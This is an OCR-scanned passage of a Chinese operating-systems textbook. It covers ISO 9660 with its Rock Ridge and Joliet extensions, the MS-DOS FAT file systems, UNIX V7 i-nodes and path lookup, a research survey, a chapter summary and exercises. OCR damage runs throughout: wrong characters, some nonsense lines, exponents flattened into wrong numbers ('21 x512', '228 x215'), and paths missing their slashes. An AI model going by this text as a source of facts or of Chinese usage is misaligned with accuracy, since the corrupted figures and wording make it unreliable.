用 0 代 蔡 。 最 后 一 个 域 是 系统 使 用 域 ， 该 域 的 功能 和 大 小 没有 定义 ， 仅 
仅 只 要 求 该 域 为 偶数 个 字 世 。 不 同 的 系统 对 该 域 有 不 同 的 用 途 。 例 
如 ，Macintosh 系 统 就 把 此 域 用 来 保存 Finder 标 志 。 


一 个 目录 中 的 项 除了 前 两 项 之 外 ， 其 余 的 都 按 字 母 顺序 排列 。 第 
一 项 表示 当前 目录 本 遇 ， 第 二 项 表示 当前 目录 的 父 目录 。 这 和 UNIX 的 . 
目录 和 .. 目 录 相 似 。 而 文件 本 身 不 需要 按 其 目录 项 在 目录 中 的 顺序 来 排 
il ° 


对 于 目录 中 目录 项 的 数目 没有 特定 的 限制 ， 但 是 对 于 目 永 的 藤 套 
深度 有 限制 ， 最 大 的 目录 组 套 深度 为 8° 为 了 使 得 有 关 的 实现 简化 一 
些 ， 这 个 限制 是 任意 设置 的 。 


ISO 9660 定 义 了 三 个 级 别 。 级 别 1 的 限制 最 多 ， 限 制 文件 名 使 用 上 
面 提 到 的 8+3 个 字符 的 表示 法 ， 而 且 所 有 的 文件 必须 是 连续 的 〈 这 些 我 
们 在 前 面 介绍 过 ) 。 进 而 ， 目 录 名 被 限制 在 8 个 字符 而 且 不 能 有 扩展 
名 。 这 个 级 别 的 使 用 ， 使 得 CD-ROM 可 以 在 所 有 的 机 器 上 读 出 。 


级 别 2 放宽 了 对 长 度 的 限制 。 它 允许 文件 和 目 孙 名 多 达 31 个 字符 ， 


但 是 字符 集 还 是 一 样 的 。 


级 别 3 使 用 和 级 别 2 同样 的 限制 ， 但 是 文件 不 需要 是 连续 的 。 在 这 
个 级 别 上 ， 一 个 文件 可 以 由 几 个 段 (extents) 构成 ， 每 一 个 段 可 以 由 大 
干 连续 分 块 构成 。 同 一 个 分 块 可 以 在 一 个 文件 中 出 现 多 次 ， 也 可 以 出 
现在 两 个 或 者 更 多 的 文件 中 。 如 琳 相 当 大 的 一 部 分 数据 在 几 个 文件 中 
重复 ， 级 别 3 则 通过 要求 数据 不 能 出 现 多 次 来 进行 空间 上 的 优化 。 


2.Rock Ridge 扩 展 


正如 我 们 上 面 所 看 到 的 ，ISO 9660 在 很 多 方面 有 限制 。 在 这 个 标准 
公布 不 入 ，UNIX 工 作者 开始 在 这 个 标准 上 进行 扩展 ， 使 得 在 CD-ROM 
上 能 实现 UNIX 文 件 系统 。 这 个 扩展 被 命名 为 Rock Ridge， 这 个 名 字 来 
Wi T Gene Wilder 的 电影 《Blazing Saddles》 中 一 个 小 镇 ， 也 许 委员 会 的 
成 员 之 一 喜欢 这 个 电影 ， 便 以 此 命名 。 


该 扩展 使 用 了 系统 使 用 域 ， 使 得 Rock Ridge CD-ROM 可 以 在 所 有 
计算 机 上 可 读 。 其 他 所 有 的 域 仍然 保持 ISO 9660 标 准 中 的 定义 。 所 有 其 
他 不 识别 Rock Ridge 扩 展 的 系统 只 需要 忽略 这 个 域 ， 把 强 当 作 普 通 的 
CD-ROM 来 识别 即 可 。 


该 扩展 分 为 下 面 儿 个 域 : 


1)PX 一 一 POSIX 属 性 。 

2)PN 一 一 主 设备 号 和 次 设备 号 。 
3)SIL 一 -符号 链接 。 
4)NM 一 一 替代 名 。 
5)CL 一 一 子 位 置 。 
6)PL 一 一 父 位 置 。 
7)RE 一 一 重 定位 。 
8)IF 一 一 时 间 惟 。 


PX 域 包 含 了 标准 UNIX 的 rwxrwxrwx 所 有 考 、 同 组 用 户 和 其 他 用 户 
权限 位 。 也 包含 了 包含 在 模式 字 中 的 其 他 位 ， 如 SETUID 位 和 SETGID 


位 等 。 


为 了 能 在 CD-ROM 上 表示 原始 设备 ， 需 要 PN 域 来 表示 。 该 域 包 含 
了 和 文件 相关 的 主 设备 号 和 次 设备 号 。 这 样 ，/dev 目 录 的 内 容 就 可 以 在 
写 到 CD-ROM 上 之 后 在 目标 系统 上 重新 正确 地 构造 。 


SL 域 是 符号 链接 ， 它 允许 在 一 个 文件 系统 上 的 文件 可 以 引用 男 一 
人 


最 重要 的 域 是 NM 域 。 它 允许 同一 个 文件 可 以 关联 第 二 个 名 字 。 这 
个 名 字 不 受 ISO 9660 字 符 集 和 长 度 的 限制 ， 这 样 使 得 在 CD-ROM 上 可 以 
表示 任意 的 UNIX 文 件 。 


接 下 来 的 三 个 域 一 起 用 来 消除 ISO 9660 中 的 对 目录 内 套 深度 为 8 的 
限制 。 使 用 这 几 个 域 可 以 指明 一 个 目 孙 被 重 定位 了 ， 而 且 可 以 标明 其 
层次 结构 。 这 对 于 消除 深度 限制 非常 有 用 。 


最 后 ，TF 域 包含 了 每 个 UNIX 的 i 节点 中 的 三 个 时 间 礁 :文件 创建 
时 间 、 文 件 修改 时 间 和 文件 最 后 访问 的 时 间 。 有 了 这 些 扩展 ， 就 可 以 
将 一 个 UNIX 文 件 系统 复制 到 CD-ROM 上 ， 并 且 能 够 在 不 同 的 系统 上 正 
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3.Joliet 扩 展 


UNIX 委 员 会 不 是 惟一 对 ISO 9660 进 行 扩展 的 小 组 ， 微 软 也 发 现 了 
这 个 标准 有 太 多 的 限制 (尽管 这 些 限制 最 初 都 是 由 于 微软 自己 的 MS- 
DOS 引 起 的 ) 。 所 以 微软 也 做 了 一 些 扩展 ， 名 为 Joliet。 这 个 扩展 设计 
的 目的 是 ， 为 了 能 够 将 Windows 文 件 系 统 复 制 到 CD-ROM 上 ， 并 且 能 够 
恢复 (与 为 UNIX 设 计 Rock Ridge 的 思路 一 样 ) 。 实 际 上 所 有 能 在 
Windows 上 运行 的 、 使 用 CD-ROM 的 程序 都 支持 Joliet， 包 括 可 写 CD 的 
刻录 程序 。 通 常 这 些 程序 都 让 用 户 选择 是 使 用 ISO 9660 标 准 还 是 Joliet 
标准 。 


Joliet 提 供 的 主要 扩展 为 : 
1) 长 文件 名 。 


2)Unicode 字 人 符 集 


3) 比 8 层 更 深 的 目录 幅 套 深度 。 


4) 市 扩展 名 的 目 永 。 


第 一 个 扩展 允许 文件 名 多 达 64 字 符 。 第 二 个 扩展 允许 文件 名 使 用 
Unicode 字 符 集 ， 这 个 扩展 对 那些 不 使 用 拉丁 字符 集 的 国家 非常 重要 ， 
如 日 本 、 以 色 列 和 希腊。 因为 Unicode 字 符 是 2 个 字 节 的 ， 所 以 Joliet 最 
长 的 文件 名 可 以 达到 128 字 市 


和 Rock Ridge 一 样 ，Joliet 同 样 消除 了 对 目录 峰 套 深度 的 限制 。 目 
杂 可 以 根据 需要 达到 一 定 的 肉 套 深度 。 最 后 ， 目 杂 名 也 可 以 有 扩展 
名 。 目 前 还 不 清楚 为 什么 有 这 个 扩展 ， 因 为 大 多 数 的 Windows 目 录 从 来 
没有 扩展 名 ， 但 或 许 有 一 天 会 用 到 。 


4.5.2 ”MS-DOS 文件 系统 


MS-DOS 文 件 系 统 是 第 一 个 IBM PC 系列 所 采用 的 文件 系统 。 它 也 
z= Windows 98-5j Windows ME 所 采用 的 主要 的 文件 系统 。Windows 
2000 ` Windows XP 与 Windows Vista 上 也 支持 它 ， 虽 然 除 了 软盘 以 外 ， 
它 现 在 已 经 不 再 是 新 的 PC 的 标准 了 。 但 是 ， 它 和 它 的 扩展 (FAT-32) 
一 直 被 许多 蔷 入 式 系统 所 广泛 使 用 。 大 部 分 的 数码 相机 使 用 它 。 许 多 
MP3 播 放 器 只 能 使 用 它 。 流 行 的 苹果 公司 的 iPod 使 用 它 作 为 默认 的 文件 
系统 ， 尽 管 知识 渊博 的 骇 客 可 以 重新 格式 化 iPod 并 安装 一 个 不 同 的 文件 
系统 。 使 用 MS-DOS 文 件 系 统 的 电子 设备 的 数量 现在 要 远 远 多 于 过 去 ， 
并 且 当 然 远 远 多 于 使 用 更 现代 的 NTFS 文 件 系 统 的 数量 。 因 此 ， 我 们 有 
必要 看 一 看 其 中 的 一 些 细 广 。 


要 读 文 件 时 ，MS-DOS 程 序 首先 要 调用 open 系 统 调用 ， 以 获得 文件 
的 句柄 。open 系 统 调用 识别 一 个 路 径 ， 可 以 站 绝对 路 径 或 者 是 相对 于 
现在 工作 目录 的 路 径 。 路 径 是 一 个 分 量 一 个 分 量 地 查找 的 ， 直 到 查 到 
最 终 的 目录 并 读 进 内 存 。 然 后 开始 搜索 要 打开 的 文件 。 


尽管 MS-DOS 的 目录 是 可 变 大 小 的 ， 但 它 使 用 固定 的 32 字 节 的 目录 
项 ，MS-DOS 的 目录 项 的 格式 如 图 4-31 所 示 。 它 包含 文件 名 、 属 性 、 建 
立 日 期 和 时 间 、 起 始 块 和 具体 的 文件 大 小 。 在 每 个 分 开 的 域 中 ， 少 于 
8+3 个 字符 的 文件 名 左 对 齐 ， 在 右边 补 空格 。 属 性 域 是 一 个 新 的 域 ， 包 
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位 。 不 能 写 只 读 文 件 ， 这 样 避免 了 文件 意外 受 损 。 人 存档 位 没有 对 应 的 
操作 系统 的 功能 〈 即 MS-DOS 不 检查 和 设置 它 ) 。 存 档 位 主要 的 用 途 是 
使 用 户 级 别 的 存档 程序 在 存档 一 个 文件 后 清理 这 一 位 ， 其 他 程序 在 修 
改 了 这 个 文件 之 后 设置 这 一 位 。 以 这 种 方式 ， 一 个 备份 程序 可 以 检查 
每 个 文件 的 这 一 位 来 确定 是 否 需要 备份 该 文件 。 设 置 隐藏 位 能 够 使 一 
个 文件 在 目录 列表 中 不 出 现 ， 其 作用 是 避免 初级 用 户 补 一些 不 熟悉 的 
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del 命 令 删 除 ， 在 MS-DOS 的 主要 组 成 部 分 中 ， 系 统 位 都 被 设置 。 


扩展 名 属性 保留 时 间 日 期 第 一 块 块 号 


图 4-31 MS-DOS 的 目录 项 


目录 项 也 包含 了 文件 建立 和 最 后 修改 的 日 期 和 时 间 。 时 间 只 是 精 
确 到 +2s， 因 为 它 只 是 用 2 个 字 市 的 域 来 存储 ， 只 能 存储 65 536 个 不 同 的 
值 (一 天 包含 86 400 秒 ) 。 这 个 时 间 域 被 分 为 秒 (5 个 位 ) 、 分 (6 个 
位 ) 和 小 时 (5 个 位 ) 。 以 日 为 单位 计算 的 日 期 使 用 三 个 子 域 : 日 (5 
Mit) ， 月 (4 个 位 ) ， 年 -1980 (7 个 位 ) 。 用 7 个 位 的 数字 表示 年 ， 时 
间 的 起 始 为 1980 年 ， 最 高 的 表示 年 份 是 2107 年 。 所 以 MS-DOS 有 内 在 的 


2108 年 问题 。 为 了 避免 灾难 ，MS-DOS 的 用 户 应 该 尽快 开始 在 2108 年 之 
前 转变 工作 。 如 果 把 MS-DOS 使 用 组 合 的 日 期 和 时 间 域 作为 32 位 的 秒 计 
数 姨 ， 它 就 能 准确 到 秒 ， 可 把 灾难 推迟 到 2116 年 。 


MS-DOS 按 32 位 的 数字 存储 文件 的 大 小 ， 所 以 理论 上 文件 大 小 能 够 
大 至 4GB。 尽 管 如 此 ， 其 他 的 约束 (FER) 将 最 大 文件 限制 在 2GB 
或 者 更 小 。 让 人 吃惊 的 是 目录 项 中 的 很 大 一 部 分 空间 (LOFT) 没有 
使 用 。 


MS-DOS 通 过 内 存 里 的 文件 分 配 表 来 跟 唆 文 件 块 。 目 隶 表 项 包含 了 
第 一 个 文件 块 的 编号 ， 这 个 编号 用 作 内 存 里 有 64K 个 目录 项 的 FAT 的 索 
引 。 治 着 这 条 链 ， 所 有 的 块 都 能 找到 。FAI 的 操作 在 图 4-12 中 有 描述 。 


FAT 文 件 系统 总 共有 三 个 版 本 : FAT12，EFAT16 和 FAT32， 取 决 于 
磁盘 地 址 包含 有 多 少 二 进 制 位 。 其 实 ，FAT32 只 用 到 了 地 址 空间 中 的 
低 28 位 ， 它 更 应 该 叫 FAT-28。 但 使 用 2 的 只 的 这 种 表述 听 起 来 要 人 匀 整 得 


多 。 


在 所 有 的 FAT 中 ， 都 可 以 把 磁 副 块 大 小 调整 到 512 字 节 的 倍数 (不 
同 的 分 区 可 能 采用 不 同 的 倍数 ) ， 合 法 的 块 大 小 (微软 称 之 为 艇 大 
小 ) 在 不 同 的 FAT 中 也 会 有 所 不 同 。 第 一 版 的 MS-DOS 使 用 块 大 小 为 
512 字 节 的 FAT12， 分 区 大 小 最 大 为 21 x512 字 节 (实际 上 只 有 
4086x512 字 节 ， 因 为 有 10 个 磁盘 地 址 被 用 作 特殊 的 标记 ， 如 文件 的 结 


尾 、 坏 块 等 ) 。 根 据 这 些 参数 ， 最 大 的 磁盘 分 区 大 小 约 为 2MB， 而 内 
存 里 的 FAT 表 中 有 4096 个 项 ， 每 项 2 字 节 (16 位 ) 。 若 使 用 12 位 的 目录 


项 则 会 非常 慢 。 


这 个 系统 在 软盘 条 件 下 工作 得 很 好 ， 但 当 便 盘 出 现时 ， 它 整 出 现 
问题 了 。 微 软 通过 允许 其 他 的 块 大 小 如 (1KB，2KB,4KB) 来 解决 这 
个 问题 。 这 个 修改 保留 了 FAT-12 表 的 结构 和 大 小 ， 但 是 允许 可 达 16 MB 
的 磁盘 分 区 。 


由 于 MS-DOS 文 持 在 每 个 磁盘 张 动 器 中 划分 四 个 磁盘 分 区 ， 所 以 新 
的 FAT-12 文 件 系 统 可 在 最 大 64MB 的 磁盘 上 工作 。 除 此 之 外 ， 还 必须 引 
入 新 的 内 容 。 于 是 就 引进 了 FAT16， 它 有 16 位 的 磁盘 指针 ， 而 且 人 允许 
8KB、16KB 和 32KB 的 块 大 小 (32 768 是 用 16 位 可 以 表示 的 2 的 最 大 
F) 。FAT-16 表 需要 占据 内 存 128KB 的 空间 。 由 于 当时 已 经 有 更 大 的 内 
存 ， 所 以 它 很 快 束 得 到 了 应 用 ， 并 且 取 代 了 FAT-12 和 系统。FAT-16 能 够 
支持 的 最 大 磁盘 分 区 是 2GB (64K 个 项 ， 每 个 项 32KB) ， 支 持 最 大 
8GB 的 磁盘， 即 4 个 分 区 ， 每 个 分 区 2GB 。 


对 于 商业 信和 沪 来 说 ， 这 个 限制 不 十 问题 ,但 对 于 存储 采用 DV 标准 
的 数字 视频 来 说 ， 一 个 2GB 的 文件 仅 能 保存 9 分 钟 多 一 点 的 视频 。 结 采 
束 是 无 论 磁 盖 有 多 大 ，PC 的 人 磁 僵 也 只 能 文 持 四 个 分 区 ， 能 存储 在 磁盘 
中 的 最 长 的 视频 大 约 是 38 分 钟 。 这 一 限制 也 意味 着 ， 能 够 在 线 编辑 的 
最 大 的 视频 少 于 19 分 钟 ， 因 为 同时 需要 输入 和 输出 文件 。 


BES Windows 95 第 2 版 的 发 行 ， 引 入 了 FAT-32 文 件 系统 ， 它 具有 28 
位 磁盘 地 址 。 在 Windwos 95 下 的 MS-DOS 也 被 改造 ， 以 适应 FAT32。 在 
这 个 系统 中 ， 分 区 理论 上 能 达到 228 x215 字 节 ， 但 实际 上 是 限制 在 2TB 
(2048GB) ， 因 为 系统 在 内 部 的 512 字 节 长 的 扇 区 中 使 用 了 一 个 32 位 
的 数字 来 记录 分 区 的 大 小 ， 这 样 29 x232 是 2TB。 对 应 不 同 的 块 大 小 以 
及 所 有 三 种 FAT 类 型 的 最 大 分 区 都 在 图 4-32 中 表示 出 来 。 


图 4-32 对 应 不 同 的 块 大 小 的 最 大 分 区 《空格 表示 禁止 这 种 组 合 ) 


除了 支持 更 大 的 磁盘 之 外 ，FAT-32 文 件 系 统 相 比 FAT-16 文 件 系 统 
有 另外 两 个 优点 。 首 先 ， 一 个 用 FAT-32 的 8GB 磁 盘 可 以 是 一 个 分 区 ， 而 
使 用 FAT-16 则 必须 是 四 个 分 区 ， 对 于 Windows 用 户 来 说 ， 整 
是 “C:”、“D:”、 呈 :和 二:*” 逻 辑 磁 盘 驱 动 器 。 用 户 可 以 自己 决定 哪个 文 
件 放 在 哪个 盘 以 及 记录 的 内 容 放 在 什么 地 方 。 


FAT32 相 对 于 FAT-16 的 另外 一 个 优点 是 ， 对 于 一 个 给 定 大 小 的 硬 
盘 分 区 ， 可 以 使 用 一 个 小 一 点 的 块 大 小 。 例 如 ， 对 于 一 个 2GB 的 硬盘 
分 区 ，EFAT16 必 须 使 用 32KB 的 块 ， 否 则 仅 有 的 64K 个 磁 僵 地 址 融 不 能 
禾 盖 整个 分 区 。 相 反 ，EFAT32 处 理 一 个 2GB 的 硬盘 分 区 的 时 候 就 能 够 使 
用 4KB 的 块 。 使 用 小 块 的 好 处 是 大 部 分 文件 都 小 于 32KB。 如 果 块 大 小 
是 32KB， 那 么 一 个 10 字 节 的 文件 束 占 用 32KB 的 空间 ， 如 采 文 件 平均 大 
小 是 8KB， 使 用 32KB 的 块 大 小 ，3/4 的 磁盘 空间 会 被 浪费 ， 这 不 是 使 用 
磁盘 的 有 效 方法 。 而 8KB 的 文件 用 4KB 的 块 没有 空间 的 损失 ， 却 会 有 更 
多 的 RAM 被 FAT 系 统 占 用 。 把 4KB 的 块 应 用 到 一 个 2GB 的 磁盘 分 区 ， 会 
有 512K 个 块 ， 所 以 FAT 系 统 必须 在 内 存 里 包含 512K 个 项 (占用 了 2MB 
的 RAM) 。 


MS-DOS 使 用 FAT 来 跟 趴 空 内 人 磁 副 块 。 当 前 没有 分 配 的 任何 块 都 会 
标 上 一 个 特殊 的 代码 。 当 MS-DOS 需 要 一 个 新 的 位 强 块 时 ， 它 会 搜索 
FAT 以 找到 一 个 包含 这 个 代码 的 项 。 所 以 不 需要 位 图 或 者 空闲 表 。 


4.5.3 UNIX V7 文件 系统 


即使 是 早期 版 本 的 UNIX 也 有 一 个 相当 复杂 的 多 用 户 文件 系统 ， 因 
为 它 是 从 MULTICS 继 承 下 来 的 。 下 面 我 们 将 会 讨论 V7 文件 系统 ， 这 是 
为 PDP-11 创 建 的 一 个 文件 系统 ， 它 也 使 得 UNIX 闻 名 于 世 。 我 们 将 在 第 
10 章 通过 Linux 讨 论 现代 UNIX 的 文件 系统 。 


文件 系统 从 根 目 录 开 始 形 成 树 状 ， 加 上 链接 ， 形 成 了 一 个 有 问 无 
环 图 。 文 件 名 可 以 多 达 14 个 字符 ， 能 够 容纳 除了 /和 NUL 之 外 的 任何 
ASCII 字 符 ，NUL 也 表示 成 数字 数值 0。 


UNIX 目 永 中 为 每 个 文件 保留 了 一 项 。 每 项 都 很 简单 ， 因 为 UNIX 
使 用 i 证 点 ， 如 图 4-13 中 所 示 。 一 个 目录 项 包含 了 两 个 域 ， 文件 名 (14 
SET) 和 i 市 后 的 编号 (SFT) ， 如 图 4-33 所 示 。 这 些 参数 决定 了 
每 个 文件 系统 的 文件 数目 为 64K。 


图 4-33 UNIXYV7 的 目录 表 项 


就 像 图 4-13 中 的 节点 一 样 ，UNIX 的 i 节点 包含 一 些 属性 。 这 些 属 
性 包括 文件 大 小 、 三 个 时 间 (创建 时 间 ， 最 后 访问 时 间 ， 最 后 修改 时 
间 ) 、 所 有 者 、 所 在 组 、 保 护 信息 以 及 一 个 计数 (用 于 记录 指向 i 节点 
的 目录 项 的 数量 ) 。 最 后 一 个 域 是 为 了 链接 而 设 的 。 当 一 个 新 的 链接 
加 到 一 个 i 币 点 上 上 ，i 节 扩 里 的 计数 束 会 加 1。 当 移 走 一 个 连 授时， 该 计 
数 残 城 1。 当 计数 为 0 时 ， 婚 收回 该 让 点 ， 并 将 对 应 的 磁盘 块 放 进 衬 朵 
表 。 


对 于 特别 大 的 文件 ， 可 以 通过 图 4-13 所 示 的 方法 来 跟踪 磁盘 块 。 前 
10 个 磁盘 地 址 是 存储 在 i 节点 自身 中 的 ， 所 以 对 于 小 文件 来 说 ， 所 有 必 
需 的 信息 恰好 是 在 i 节点 中 。 而 当 文件 被 打开 时 ，i 节 点 将 被 从 磁盘 取 到 
内 存 中 。 对 于 大 一 些 的 文件 ,i 节点 内 的 其 中 一 个 地 址 是 称 为 一 次 间接 
块 (single indirect block) 的 磁盘 块 地 址 。 这 个 块 包含 了 附加 的 磁 强 地 
址 。 如 果 还 不 够 的 话 ， 在 i 节点 中 还 有 男 一 个 地 址 ， 称 为 二 次 间接 块 
(double indirect block) 。 它 包含 一 个 块 的 地 址 ， 在 这 个 块 中 包含 若干 
个 一 次 间接 块 。 每 一 个 这 样 的 一 次 间接 块 指 向 数 百 个 数据 块 。 如 果 这 
样 还 不 够 的 话 ， 可 以 使 用 三 次 间接 块 (triple indirect block) 。 整 个 情 
况 参 见 图 4-34。 
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当 打 开 茶 个 文件 时 ， 文 件 系统 必须 要 获得 文件 名 并 且 定 位 它 所 在 
的 磁盘 块 。 让 我 们 来 看 一 下 怎样 查找 路 径 名 /usrastmbox。 以 UNIX 为 
例 ， 但 对 所 有 的 层次 目录 系统 来 说 ， 这 个 算法 是 大 致 相同 的 。 目 先 ， 
文件 系统 定位 根 目 永 。 在 UNIX 系 统 中 ， 根 目录 的 i ET eh aE 
定 的 位 置 。 从 这 个 ji 点， 系统 将 可 以 定位 根 目 孙 ， 虽 然 根 目 孙 可 以 放 
在 亿 副 上 的 任何 位 置 ， 但 假定 它 放 在 人 磁 表 块 1 的 位 置 。 


图 4-34 一 个 UNIX 的 i 节点 


接 下 来 ， 系 统 读 根 目 录 并 且 在 根 目录 中 查找 路 径 的 第 一 个 分 量 
usr， 以 获取 /usr 目 录 的 i 节 点 号 。 由 i 节 点 号 来 定位 i 和 点 是 很 直接 的 ， 
为 每 个 i 节点 在 磁盘 上 都 有 固定 的 位 置 。 根 据 这 个 节点， 系统 定位 /usr 


目录 并 在 其 中 查找 下 一 个 分 量 ast。 一 旦 找到 ast 的 项 ， 便 找到 了 /usrast 
BRANT 点 。 依 据 这 个 市 点 ， 可 以 定位 该 目 孙 并 在 其 中 查找 mbox。 然 
后 ， 这 个 文件 的 市 点 个 读 入 内 存 ， 并 且 在 文件 天 闭 之 前 会 一 直 保 留 在 
内 存 中 。 图 4-35 显 示 了 查找 的 过 程 。 


块 132 是 /usr/ast 的 块 406 是 
/usr A 3K i 节点 26 usr/ast H 3 
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图 4-35 ”查找 /usr/ast/mbox 的 过 程 


相对 路 径 名 的 查找 同 绝对 路 径 的 查找 方法 相同 ， 只 不 过 是 从 当前 
工作 目录 开始 碍 找 而 不 是 从 根 目 永 开始 。 每 个 目 孙 都 有 .和 .. 项 ， 它 们 是 
在 目录 创建 的 时 候 同 时 创建 的 。. 表 项 是 当前 目 孙 的 i 节 点 号 ， 而 .. 表 项 
EHR (上 一 层 目 录 ) 的 i 节点 号 。 这 样 ， 查 找 ../dick/prog.c 的 过 程 就 
成 为 在 工作 目 东 中 查找 ..， 寻 找 父 目录 的 i 节点 号 ， 并 查询 dick 目 录 。 不 
需要 专门 的 机 制 处 理 这 些 名 字 。 目 录 系 统 只 要 把 这 些 名 字 看 作 普 通 的 
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根 目录 中 指 癌 目 里。 
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文件 系统 总 是 比 操作 系统 的 其 他 部 分 吸引 了 更 多 的 研究 ， 现 在 也 
是 这 样 。 当 标准 的 文件 系统 被 完全 理解 后 ， 现 在 还 有 很 多 后 续 的 关于 
优化 高 速 缓存 管理 的 研究 (Burnett 等 人 ，2002; Ding A, 2007; 
Gnaidy 等 人 ，2004; Kroeger 和 Long，2001; Pai 等 人 ，2000; 以 及 
Zhou 等 人 ，2001) 。 后 续 的 工作 还 有 关于 新 类 型 的 文件 系统 ， 例 如 用 
户 级 别 的 文件 系统 (Mazi`eres, 2001) ， 闪 存 文件 系统 (Gal 等 人 ， 
2005) ， 日 志文 件 系 统 (Prabhakaran 等 人 ，2005; 以 及 Stein 等 人 ， 
2001) ， 版 本 控制 (versioning) 文件 系统 (Cornell 等 人 ，2004) ， 对 
等 (peer-to-peer) 文件 系统 (Muthitacharoen 等 人 ，2002) ， 以 及 其 
他 。Google 文 件 系 统 也 不 寻常 ， 因 为 它 有 极 好 的 容错 性 能 (Ghemawat 
等 人 ，2003) 。 文 件 系 统 内 不 同 的 查询 方法 也 是 很 有 意义 (Padioleau 
和 Ridoux，2003) 。 


男 一 个 受到 关注 的 领域 是 起 源 (provenance) 追踪 数据 的 历 
史 ， 包 括 它 们 来 自 哪里 ， 谁 拥有 它们 ， 以 及 它们 是 如 何 转换 的 
(Muniswarmy-Reddy 等 人 ，2006; 以 及 Shah 等 人 ，2007) 。 这 个 信息 
可 以 以 不 同 的 方式 加 以 运用 。 备 份 也 一 直 受 到 关注 (Cox 等 人 ， 
2002; 以 及 Rycroft 等 人 ，2006) ， 如 同 恢复 的 相关 主题 一 样 (Keeton 
等 人 ，2006) 。 与 备份 有 关 的 还 有 ， 设 法 保持 数据 几 十 年 ， 并 仍旧 可 


以 使 用 (Baker 等 人 ，2006; Maniatis“? A, 2003) 。 可 靠 性 与 安全 性 
也 是 需要 解决 的 问题 (Greenan 和 Miller，2006; Wires 和 Feeley， 
2007; Wright 等 人 ，2007; 以 及 Yang 等 人 ，2006) 。 最 后 ， 性 能 始终 
是 一 个 值得 研究 的 主题 (Caudil 和 Gavrikovska，2006; Chiang 和 
Huang, 2007; Stein, 2006; Wang 等 人 ，2006a; 以 及 Zhang 和 


Ghose，2007) 。 


4.7 ”小结 


从 外 部 看 ， 文 件 系统 是 一 组 文件 和 目录 ， 以 及 对 文件 和 目 孙 的 操 
作 。 文 件 可 以 被 读 写 ， 目 孙 可 以 被 创建 和 删除 ， 并 可 将 文件 从 一 个 目 
录 移 到 男 一 个 目录 中 。 大 多 数 现代 操作 系统 都 支持 层次 目录 系统 ， 其 
遇 。， 具 对齐 还 有 于 月 未， 手 目 对 外 还 可 以 有 于 目 亲 区 元 居 下 专 字 


而 在 内 部 看 ， 文 件 系 统 又 是 另 一 番 景 象 。 文 件 系统 的 设计 者 必须 
考虑 存储 区 是 如 何 分 配 的 ， 系 统 如 何 记 录 哪 个 块 分 给 了 哪个 文件 。 可 
能 的 方案 有 连续 文件 、 链 表 、 文 件 分 配 表 和 i 节点 等 。 不 同 的 系统 有 不 
同 的 目录 结构 。 属 性 可 以 存在 目录 中 或 存在 别处 比如， 在 i 节点 
H) 。 磁 盘 空 间 可 以 通过 位 图 的 空闲 表 来 管理 。 通 过 增 量 转 储 以 及 用 
程序 修复 故障 文件 系统 的 方法 ， 可 以 提高 文件 系统 的 可 靠 性 。 文 件 系 
统 的 性 能 非常 重要 ， 可 以 通过 多 种 途径 提高 性 能 ， 包 括 高 速 缓存 、 预 
读 取 以 及 尽 可 能 仔细 地 将 一 个 文件 中 的 块 紧密 地 放置 在 一 起 等 方法 。 
日 志 结 构 文件 系统 通过 大 块 单元 写 入 的 操作 也 可 以 改善 性 能 。 


文件 系统 的 例子 有 ISO 9660、MS-DOS 以 及 UNIX。 它 们 之 间 在 怎 
样 记 录 每 个 文件 所 使 用 的 块 、 目 录 结 构 以 及 对 空 闪 磁盘 空间 管理 等 方 
面 都 存在 着 差别 。 


习题 


1. 在 早期 的 UNIX 系 统 中 ， 可 执行 文件 (aout) 以 一 个 非常 特别 的 
魔 数 开始 ， 这 个 数 不 是 随机 选择 的 。 这 些 文 件 都 有 文件 头 ， 后 面 是 正 
文 段 和 数据 段 。 为 什么 要 为 可 执行 文件 挑选 一 个 非常 特别 的 魔 数 ， 而 
其 他 类 型 文件 的 第 一 个 字 反 而 有 一 个 或 多 或 少 是 随机 选择 的 魔 数 ? 


2. 在 图 4-4 中 ， 一 个 属性 是 记录 长度 。 为 什么 操作 系统 要 关心 这 个 
属性 ? 


3. 在 UNIX 中 open 系 统 调用 绝对 需要 吗 ? 如 果 没 有 会 产生 什么 结 
果 ? 


4. 在 文 持 顺序 文件 的 系统 中 总 有 一 个 文件 回 绕 操 作 ， 文 持 随 机 存 
取 文 件 的 系统 是 否 也 需要 该 操作 ? 


5. 某 一 些 操 作 系统 提供 系统 调用 rename 给 文件 重 命名 ， 同 样 也 可 
以 通过 把 文件 复制 到 新 文件 并 删除 原文 件 而 实现 文件 重 命 名 。 请 问 这 
两 种 方法 有 何不 同 ? 


6. 在 有 些 系统 中 有 可 能 把 部 分 文件 映射 进 内 存 中 。 如 此 一 来 系统 
应 该 施加 什么 限制 ? 这 种 部 分 映射 如 何 实现 ? 
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有 任意 多 个 文件 ， 且 带 有 任意 长 度 的 名 子 。 这 样 可 以 模拟 层次 文件 系 
统 吗 ?如何 进行 ? 


8. 在 UNIX 和 Windows 中 ， 通 过 使 用 一 个 特殊 的 系统 调用 把 文件 
的 “当前 位 置 ?指针 移 到 指定 字 节 ， 从 而 实现 了 随机 访问 。 请 提出 一 个 
不 使 用 该 系统 调用 完成 随机 存 取 的 奉 代 方案 。 


9. 考 虑 图 4-8 中 的 目录 树 ， 如 采 当 前 工作 目 隶 是 /usr/jim， 则 相对 路 
径 名 为 .ast/x 的 文件 的 绝对 路 径 名 是 什么 ? 


10. 正 如 书 中 所 提 到 的 ， 文 件 的 连续 分 配 会 导致 磁盘 碎片 ， 因 为 当 
一 个 文件 的 长 度 不 等 于 块 的 整数 倍 时 ， 文 件 中 的 最 后 一 个 磁 副 块 中 的 
THAW o AAEN DEIER? 并 将 它 与 先前 一 章 的 有 
天 讨论 进行 比较 。 


11. 一 种 在 磁 副 上 连续 分 配 并 且 可 以 避免 空洞 的 方案 是 ， 每 次 删除 
一 个 文件 后 就 紧缩 一 下 磁盘 。 由 于 所 有 的 文件 都 是 连续 的 ， 复 制 文件 
时 需要 寻 道 和 旋转 延迟 以 便 读 取 文 件 ， 然 后 全 速 传 送 。 在 写 回 文件 时 
要 做 同样 的 工作 。 假 设 寻 道 时 间 为 5ms， 旋 转 延 迟 为 4 ms， 传 送 速率 
为 8MB/s， 而 文件 平均 长 度 是 8 KB， 把 一 个 文件 读 入 内 存 并 写 回 到 磁 
盘 上 的 一 个 新 位 置 需要 多 长 时 间 ? 运用 这 些 数字 ， 计 算 紧 缩 16GB 人 磁 副 
的 一 半 需 要 多 长 时 间 ? 
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13. 某 些 数字 消费 设备 需要 存储 数据 ， 比 如 存放 文件 等 。 给 出 一 个 
